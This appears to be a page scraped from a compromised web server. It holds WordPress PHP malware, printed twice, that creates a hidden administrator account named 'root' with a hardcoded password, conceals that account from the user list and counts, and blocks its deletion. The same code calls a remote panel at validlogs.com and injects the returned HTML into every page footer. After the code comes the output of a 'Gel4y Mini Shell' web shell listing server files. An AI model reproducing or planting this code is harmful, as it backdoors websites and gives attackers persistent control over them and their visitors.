function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.187)
  • Path: ~/lib/python3.9/lib2to3/fixes/
    Name Size Permission Action
    __init__.py 0.046KB -rw-r--r--
    fix_apply.py 2.291KB -rw-r--r--
    fix_asserts.py 0.961KB -rw-r--r--
    fix_basestring.py 0.313KB -rw-r--r--
    fix_buffer.py 0.576KB -rw-r--r--
    fix_dict.py 3.672KB -rw-r--r--
    fix_except.py 3.266KB -rw-r--r--
    fix_exec.py 0.956KB -rw-r--r--
    fix_execfile.py 2KB -rw-r--r--
    fix_exitfunc.py 2.437KB -rw-r--r--
    fix_filter.py 2.7KB -rw-r--r--
    fix_funcattrs.py 0.629KB -rw-r--r--
    fix_future.py 0.534KB -rw-r--r--
    fix_getcwdu.py 0.44KB -rw-r--r--
    fix_has_key.py 3.121KB -rw-r--r--
    fix_idioms.py 4.762KB -rw-r--r--
    fix_import.py 3.18KB -rw-r--r--
    fix_imports.py 5.551KB -rw-r--r--
    fix_imports2.py 0.282KB -rw-r--r--
    fix_input.py 0.691KB -rw-r--r--
    fix_intern.py 1.117KB -rw-r--r--
    fix_isinstance.py 1.57KB -rw-r--r--
    fix_itertools.py 1.512KB -rw-r--r--
    fix_itertools_imports.py 2.037KB -rw-r--r--
    fix_long.py 0.465KB -rw-r--r--
    fix_map.py 3.555KB -rw-r--r--
    fix_metaclass.py 8.004KB -rw-r--r--
    fix_methodattrs.py 0.592KB -rw-r--r--
    fix_ne.py 0.558KB -rw-r--r--
    fix_next.py 3.1KB -rw-r--r--
    fix_nonzero.py 0.577KB -rw-r--r--
    fix_numliterals.py 0.75KB -rw-r--r--
    fix_operator.py 3.346KB -rw-r--r--
    fix_paren.py 1.198KB -rw-r--r--
    fix_print.py 2.777KB -rw-r--r--
    fix_raise.py 2.857KB -rw-r--r--
    fix_raw_input.py 0.443KB -rw-r--r--
    fix_reduce.py 0.817KB -rw-r--r--
    fix_reload.py 1.056KB -rw-r--r--
    fix_renames.py 2.169KB -rw-r--r--
    fix_repr.py 0.599KB -rw-r--r--
    fix_set_literal.py 1.657KB -rw-r--r--
    fix_standarderror.py 0.438KB -rw-r--r--
    fix_sys_exc.py 1.01KB -rw-r--r--
    fix_throw.py 1.545KB -rw-r--r--
    fix_tuple_params.py 5.435KB -rw-r--r--
    fix_types.py 1.732KB -rw-r--r--
    fix_unicode.py 1.227KB -rw-r--r--
    fix_urllib.py 8.171KB -rw-r--r--
    fix_ws_comma.py 1.064KB -rw-r--r--
    fix_xrange.py 2.631KB -rw-r--r--
    fix_xreadlines.py 0.673KB -rw-r--r--
    fix_zip.py 1.259KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet